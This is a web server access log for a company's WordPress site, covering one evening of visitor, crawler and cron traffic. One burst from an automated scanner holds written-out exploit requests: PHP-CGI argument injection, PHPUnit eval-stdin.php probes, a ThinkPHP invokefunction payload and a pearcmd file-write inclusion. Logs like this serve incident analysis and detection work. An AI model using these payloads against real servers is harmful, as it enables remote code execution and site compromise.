119.84.246.117 - - [04/Jun/2026:19:30:20 +0800] "GET /wp-content/uploads/2026/06/1780362799-1Article_images_W900px.webp HTTP/1.1" 200 61690 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1"
119.84.246.117 - - [04/Jun/2026:19:30:20 +0800] "GET /wp-content/uploads/2026/05/1779957408-1Article_images_W900px.webp HTTP/1.1" 200 36526 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1"
119.84.246.117 - - [04/Jun/2026:19:30:20 +0800] "GET /wp-content/uploads/2026/05/1779925245-Article_images_W900px.webp HTTP/1.1" 200 27996 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1"
119.84.246.117 - - [04/Jun/2026:19:30:20 +0800] "GET /wp-content/uploads/2026/05/1779328461-1Article_images_W900px.webp HTTP/1.1" 200 37908 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1"
54.38.147.254 - - [04/Jun/2026:19:42:01 +0800] "GET /news/2502 HTTP/1.1" 200 21436 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
36.133.115.36 - - [04/Jun/2026:19:47:08 +0800] "POST /wp-cron.php?doing_wp_cron=1780573628.3672111034393310546875 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
5.61.209.126 - - [04/Jun/2026:19:47:08 +0800] "GET /SDK/webLanguage HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [04/Jun/2026:19:55:19 +0800] "POST /wp-cron.php?doing_wp_cron=1780574119.1074810028076171875000 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
176.65.139.66 - - [04/Jun/2026:19:55:19 +0800] "GET / HTTP/1.0" 301 0 "-" "Shodan-Pull/1.0"
42.186.124.7 - - [04/Jun/2026:20:04:30 +0800] "GET / HTTP/1.1" 200 35636 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
42.186.124.7 - - [04/Jun/2026:20:04:35 +0800] "GET /about HTTP/1.1" 200 25029 "http://cqqizhou.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
42.186.124.7 - - [04/Jun/2026:20:04:37 +0800] "GET /news/portfolio-category/hot-dip-galvanized-coil HTTP/1.1" 200 21695 "http://cqqizhou.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
42.186.124.7 - - [04/Jun/2026:20:04:37 +0800] "GET /news/portfolio-category/remaining-rolls HTTP/1.1" 200 21650 "http://cqqizhou.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
42.186.124.7 - - [04/Jun/2026:20:04:37 +0800] "GET /services HTTP/1.1" 200 26713 "http://cqqizhou.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
42.186.123.7 - - [04/Jun/2026:20:04:37 +0800] "GET /news/portfolio-category/dual-phase-steel HTTP/1.1" 200 21684 "http://cqqizhou.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
42.186.123.7 - - [04/Jun/2026:20:04:37 +0800] "GET /news/portfolio-category/cold-rolled-coil HTTP/1.1" 200 21691 "http://cqqizhou.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
42.186.123.7 - - [04/Jun/2026:20:04:38 +0800] "GET /services/ HTTP/1.1" 301 5 "http://cqqizhou.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
36.133.115.36 - - [04/Jun/2026:20:04:38 +0800] "POST /wp-cron.php?doing_wp_cron=1780574678.0853419303894042968750 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
42.186.123.7 - - [04/Jun/2026:20:04:38 +0800] "GET /contacts/ HTTP/1.1" 301 5 "http://cqqizhou.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
42.186.124.7 - - [04/Jun/2026:20:04:39 +0800] "GET /contacts HTTP/1.1" 200 22096 "http://cqqizhou.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
14.218.53.208 - - [04/Jun/2026:20:10:44 +0800] "GET / HTTP/1.1" 200 35636 "https://www.baidu.com/link?url=gnvO5YJ22NMcyCEWJt5SReWTpmKuKt7ueDCQZ6EwOQq&wd=&eqid=e0fff0280041e013000000066a216b31" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:151.0) Gecko/20100101 Firefox/151.0"
14.218.53.208 - - [04/Jun/2026:20:10:45 +0800] "GET /wp-content/uploads/2025/07/1751425283-qizhou.kf_.qq_.com_.webp HTTP/1.1" 200 16864 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:151.0) Gecko/20100101 Firefox/151.0"
14.218.53.208 - - [04/Jun/2026:20:10:46 +0800] "GET /wp-content/uploads/2025/12/1765268955-qizhou_Slider1_3840%C3%972160_20251210-scaled.webp HTTP/1.1" 200 152162 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:151.0) Gecko/20100101 Firefox/151.0"
14.218.53.208 - - [04/Jun/2026:20:10:46 +0800] "GET /wp-content/uploads/2025/07/1753456723-%E5%8F%8C%E7%9B%B8%E9%92%A2roduct_Single600.webp HTTP/1.1" 200 22790 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:151.0) Gecko/20100101 Firefox/151.0"
14.218.53.208 - - [04/Jun/2026:20:10:46 +0800] "GET /wp-content/uploads/2025/07/1753453096-%E5%8F%8C%E7%9B%B8%E9%92%A2product_Single600%C3%97284.webp HTTP/1.1" 200 14562 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:151.0) Gecko/20100101 Firefox/151.0"
14.218.53.208 - - [04/Jun/2026:20:10:46 +0800] "GET /wp-content/uploads/2025/07/1753456770-%E7%83%AD%E9%95%80%E9%94%8C%E5%8D%B7product_Single600.webp HTTP/1.1" 200 27502 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:151.0) Gecko/20100101 Firefox/151.0"
14.218.53.208 - - [04/Jun/2026:20:10:46 +0800] "GET /wp-content/uploads/2025/07/1753453127-%E4%BD%99%E5%8D%B7product_Single600%C3%97284.webp HTTP/1.1" 200 18744 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:151.0) Gecko/20100101 Firefox/151.0"
14.218.53.208 - - [04/Jun/2026:20:10:46 +0800] "GET /wp-content/uploads/revslider/slider-1/1750861156-logistics_Slider_3840%C3%972160_20250625191356-scaled-50x100.webp HTTP/1.1" 200 1416 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:151.0) Gecko/20100101 Firefox/151.0"
14.218.53.208 - - [04/Jun/2026:20:10:46 +0800] "GET /wp-content/uploads/2026/01/1768276119-qizhoujiagong_Slider_3840%C3%972160_20260113-scaled-50x100.webp HTTP/1.1" 200 976 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:151.0) Gecko/20100101 Firefox/151.0"
14.218.53.208 - - [04/Jun/2026:20:10:47 +0800] "GET /wp-json/sliderrevolution/sliders/1?srengine=7&slideid=2 HTTP/1.1" 200 2000 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:151.0) Gecko/20100101 Firefox/151.0"
36.133.115.36 - - [04/Jun/2026:20:10:47 +0800] "POST /wp-cron.php?doing_wp_cron=1780575047.0653231143951416015625 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
14.218.53.208 - - [04/Jun/2026:20:10:47 +0800] "GET /wp-json/sliderrevolution/sliders/1?srengine=7&slideid=4 HTTP/1.1" 200 2580 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:151.0) Gecko/20100101 Firefox/151.0"
14.218.53.208 - - [04/Jun/2026:20:10:47 +0800] "GET /wp-content/uploads/revslider/slider-1/1750861156-logistics_Slider_3840%C3%972160_20250625191356-scaled.webp HTTP/1.1" 200 197360 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:151.0) Gecko/20100101 Firefox/151.0"
14.218.53.208 - - [04/Jun/2026:20:10:47 +0800] "GET /wp-content/uploads/2026/01/1768276119-qizhoujiagong_Slider_3840%C3%972160_20260113-scaled.webp HTTP/1.1" 200 131696 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:151.0) Gecko/20100101 Firefox/151.0"
14.218.53.208 - - [04/Jun/2026:20:10:48 +0800] "GET /wp-content/uploads/2025/07/1750174127-Marketing1920x800_3.webp HTTP/1.1" 200 52790 "http://cqqizhou.com/wp-content/uploads/elementor/css/post-1666.css?ver=1778295900" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:151.0) Gecko/20100101 Firefox/151.0"
14.218.53.208 - - [04/Jun/2026:20:10:58 +0800] "GET /wp-content/uploads/2026/06/1780363378-1Article_images_W900px.webp HTTP/1.1" 200 62100 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:151.0) Gecko/20100101 Firefox/151.0"
14.218.53.208 - - [04/Jun/2026:20:10:58 +0800] "GET /wp-content/uploads/2026/06/1780362799-1Article_images_W900px.webp HTTP/1.1" 200 61690 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:151.0) Gecko/20100101 Firefox/151.0"
14.218.53.208 - - [04/Jun/2026:20:10:58 +0800] "GET /wp-content/uploads/2026/05/1779957408-1Article_images_W900px.webp HTTP/1.1" 200 36526 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:151.0) Gecko/20100101 Firefox/151.0"
14.218.53.208 - - [04/Jun/2026:20:10:58 +0800] "GET /wp-content/uploads/2026/05/1779925245-Article_images_W900px.webp HTTP/1.1" 200 27996 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:151.0) Gecko/20100101 Firefox/151.0"
14.218.53.208 - - [04/Jun/2026:20:10:58 +0800] "GET /wp-content/uploads/2026/05/1779328461-1Article_images_W900px.webp HTTP/1.1" 200 37908 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:151.0) Gecko/20100101 Firefox/151.0"
14.218.53.208 - - [04/Jun/2026:20:11:04 +0800] "GET /wp-content/uploads/2025/07/1751829454-Smart-warehousing800x500.webp HTTP/1.1" 200 79504 "http://cqqizhou.com/wp-content/uploads/elementor/css/post-1666.css?ver=1778295900" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:151.0) Gecko/20100101 Firefox/151.0"
14.218.53.208 - - [04/Jun/2026:20:11:11 +0800] "GET /wp-content/uploads/2025/07/1751988544-Logistics-delivery_images_W900%C3%97300.webp HTTP/1.1" 200 26142 "http://cqqizhou.com/wp-content/uploads/elementor/css/post-1666.css?ver=1778295900" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:151.0) Gecko/20100101 Firefox/151.0"
36.133.115.36 - - [04/Jun/2026:20:16:43 +0800] "POST /wp-cron.php?doing_wp_cron=1780575403.7555289268493652343750 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
43.134.187.251 - - [04/Jun/2026:20:16:43 +0800] "GET / HTTP/1.1" 200 35195 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
116.179.32.145 - - [04/Jun/2026:20:42:37 +0800] "GET /news/2339 HTTP/1.1" 200 25088 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
116.179.37.59 - - [04/Jun/2026:20:43:08 +0800] "GET /wp-content/uploads/2025/12/1765248735-20251209104226_108_60.webp HTTP/1.1" 200 55962 "http://cqqizhou.com/news/2339" "Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)"
116.179.37.151 - - [04/Jun/2026:20:43:08 +0800] "GET /wp-content/uploads/2025/12/1765248770-20251209104226_107_60.webp HTTP/1.1" 200 66916 "http://cqqizhou.com/news/2339" "Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)"
116.179.37.31 - - [04/Jun/2026:20:43:08 +0800] "GET /wp-content/uploads/2025/12/1765249046-20251209104228_110_60.webp HTTP/1.1" 200 64834 "http://cqqizhou.com/news/2339" "Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)"
36.133.115.36 - - [04/Jun/2026:20:43:30 +0800] "POST /wp-cron.php?doing_wp_cron=1780577010.2829220294952392578125 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
27.124.17.174 - - [04/Jun/2026:20:43:30 +0800] "GET /whir_system/module/security/ezcompany_login.aspx HTTP/1.1" 404 9406 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36"
36.133.115.36 - - [04/Jun/2026:21:20:13 +0800] "POST /wp-cron.php?doing_wp_cron=1780579213.8864059448242187500000 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
129.226.146.134 - - [04/Jun/2026:21:20:13 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
14.127.26.29 - - [04/Jun/2026:21:27:06 +0800] "GET /news/2215 HTTP/1.1" 200 24554 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.0.0 Safari/537.36"
58.219.244.99 - - [04/Jun/2026:21:27:51 +0800] "GET /news/tag/%e7%89%a9%e6%b5%81 HTTP/1.1" 200 21694 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36"
119.112.197.134 - - [04/Jun/2026:21:28:01 +0800] "GET /news/tag/%e7%89%a9%e6%b5%81 HTTP/1.1" 200 21694 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36"
36.133.115.36 - - [04/Jun/2026:21:43:22 +0800] "POST /wp-cron.php?doing_wp_cron=1780580602.4920990467071533203125 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
114.119.143.68 - - [04/Jun/2026:21:43:22 +0800] "GET /robots.txt HTTP/1.1" 200 190 "-" "Mozilla/5.0 (compatible;PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
36.133.115.36 - - [04/Jun/2026:22:05:23 +0800] "POST /wp-cron.php?doing_wp_cron=1780581923.3074069023132324218750 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
103.77.215.62 - - [04/Jun/2026:22:05:23 +0800] "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 404 32979 "-" "libredtail-http"
103.77.215.62 - - [04/Jun/2026:22:05:25 +0800] "POST /?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 200 158680 "-" "libredtail-http"
103.77.215.62 - - [04/Jun/2026:22:05:26 +0800] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
103.77.215.62 - - [04/Jun/2026:22:05:27 +0800] "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
103.77.215.62 - - [04/Jun/2026:22:05:27 +0800] "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
103.77.215.62 - - [04/Jun/2026:22:05:27 +0800] "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
103.77.215.62 - - [04/Jun/2026:22:05:28 +0800] "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
103.77.215.62 - - [04/Jun/2026:22:05:28 +0800] "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
103.77.215.62 - - [04/Jun/2026:22:05:29 +0800] "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
103.77.215.62 - - [04/Jun/2026:22:05:29 +0800] "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
103.77.215.62 - - [04/Jun/2026:22:05:29 +0800] "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
103.77.215.62 - - [04/Jun/2026:22:05:30 +0800] "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
103.77.215.62 - - [04/Jun/2026:22:05:30 +0800] "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
103.77.215.62 - - [04/Jun/2026:22:05:30 +0800] "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
103.77.215.62 - - [04/Jun/2026:22:05:31 +0800] "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
103.77.215.62 - - [04/Jun/2026:22:05:31 +0800] "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
103.77.215.62 - - [04/Jun/2026:22:05:32 +0800] "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
103.77.215.62 - - [04/Jun/2026:22:05:32 +0800] "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
103.77.215.62 - - [04/Jun/2026:22:05:32 +0800] "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
103.77.215.62 - - [04/Jun/2026:22:05:32 +0800] "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
103.77.215.62 - - [04/Jun/2026:22:05:33 +0800] "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
103.77.215.62 - - [04/Jun/2026:22:05:34 +0800] "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
103.77.215.62 - - [04/Jun/2026:22:05:35 +0800] "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
103.77.215.62 - - [04/Jun/2026:22:05:35 +0800] "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
103.77.215.62 - - [04/Jun/2026:22:05:35 +0800] "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
103.77.215.62 - - [04/Jun/2026:22:05:36 +0800] "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
103.77.215.62 - - [04/Jun/2026:22:05:36 +0800] "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
103.77.215.62 - - [04/Jun/2026:22:05:36 +0800] "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
103.77.215.62 - - [04/Jun/2026:22:05:37 +0800] "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
103.77.215.62 - - [04/Jun/2026:22:05:37 +0800] "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
103.77.215.62 - - [04/Jun/2026:22:05:38 +0800] "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
103.77.215.62 - - [04/Jun/2026:22:05:38 +0800] "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
103.77.215.62 - - [04/Jun/2026:22:05:39 +0800] "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
103.77.215.62 - - [04/Jun/2026:22:05:39 +0800] "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
103.77.215.62 - - [04/Jun/2026:22:05:39 +0800] "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
103.77.215.62 - - [04/Jun/2026:22:05:40 +0800] "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
103.77.215.62 - - [04/Jun/2026:22:05:40 +0800] "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
103.77.215.62 - - [04/Jun/2026:22:05:40 +0800] "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
103.77.215.62 - - [04/Jun/2026:22:05:41 +0800] "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
103.77.215.62 - - [04/Jun/2026:22:05:42 +0800] "GET /index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" 200 67416 "-" "libredtail-http"
103.77.215.62 - - [04/Jun/2026:22:05:43 +0800] "GET /public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" 404 27 "-" "libredtail-http"
103.77.215.62 - - [04/Jun/2026:22:05:45 +0800] "GET /index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5(\x22hi\x22));?>+/tmp/index1.php HTTP/1.1" 200 158680 "-" "libredtail-http"
103.77.215.62 - - [04/Jun/2026:22:05:46 +0800] "GET /index.php?lang=../../../../../../../../tmp/index1 HTTP/1.1" 200 158680 "-" "libredtail-http"
103.77.215.62 - - [04/Jun/2026:22:05:48 +0800] "GET /containers/json HTTP/1.1" 301 5 "-" "libredtail-http"
103.77.215.62 - - [04/Jun/2026:22:05:49 +0800] "GET /containers/json HTTP/1.1" 301 5 "-" "libredtail-http"
111.23.251.44 - - [04/Jun/2026:22:12:03 +0800] "GET /news/2339 HTTP/1.1" 200 25088 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:133.0) Gecko/20100101 Firefox/133.0"
110.249.202.15 - - [04/Jun/2026:22:19:43 +0800] "GET /wp-content/uploads/2026/05/1779925245-Article_images_W900px.webp HTTP/1.1" 200 27996 "http://cqqizhou.com/" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; https://zhanzhang.toutiao.com/)"
18.201.158.113 - - [04/Jun/2026:22:32:32 +0800] "HEAD / HTTP/1.1" 200 0 "https://www.netcraft.com/survey/" "Mozilla/4.0 (compatible; Netcraft Web Server Survey)"
36.133.115.36 - - [04/Jun/2026:22:39:33 +0800] "POST /wp-cron.php?doing_wp_cron=1780583973.1429810523986816406250 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
89.169.110.216 - - [04/Jun/2026:22:39:33 +0800] "GET / HTTP/1.0" 200 109870 "-" "-"
36.133.115.36 - - [04/Jun/2026:22:46:11 +0800] "POST /wp-cron.php?doing_wp_cron=1780584371.3892331123352050781250 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
45.198.224.22 - - [04/Jun/2026:22:46:11 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
49.51.47.100 - - [04/Jun/2026:22:47:05 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [04/Jun/2026:22:47:08 +0800] "POST /wp-cron.php?doing_wp_cron=1780584428.0342800617218017578125 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
49.51.47.100 - - [04/Jun/2026:22:47:08 +0800] "GET / HTTP/1.1" 200 35194 "http://www.cqqizhou.com" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
220.181.108.105 - - [04/Jun/2026:23:06:36 +0800] "GET /wp-content/uploads/2026/01/1768527484-Article_images_W900%C3%97500px202601163.webp HTTP/1.1" 200 79498 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
110.249.201.101 - - [04/Jun/2026:23:14:18 +0800] "GET /wp-content/uploads/2026/06/1780363378-1Article_images_W900px.webp HTTP/1.1" 200 62100 "http://cqqizhou.com/" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; https://zhanzhang.toutiao.com/)"
36.133.115.36 - - [04/Jun/2026:23:18:17 +0800] "POST /wp-cron.php?doing_wp_cron=1780586297.0979270935058593750000 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
8.221.137.246 - - [04/Jun/2026:23:18:17 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11"
8.221.137.246 - - [04/Jun/2026:23:18:17 +0800] "GET / HTTP/1.1" 200 35636 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11"
36.133.115.36 - - [04/Jun/2026:23:21:15 +0800] "POST /wp-cron.php?doing_wp_cron=1780586475.1720070838928222656250 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
18.212.56.204 - - [04/Jun/2026:23:21:15 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
36.133.115.36 - - [04/Jun/2026:23:22:22 +0800] "POST /wp-cron.php?doing_wp_cron=1780586542.2991700172424316406250 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
65.0.3.234 - - [04/Jun/2026:23:22:22 +0800] "GET / HTTP/1.1" 301 5 "-" "Go-http-client/1.1"
65.0.3.234 - - [04/Jun/2026:23:22:23 +0800] "GET / HTTP/1.1" 200 35636 "http://36.133.115.36" "Go-http-client/1.1"
198.244.183.60 - - [04/Jun/2026:23:41:12 +0800] "GET /news/2592 HTTP/1.1" 200 24713 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
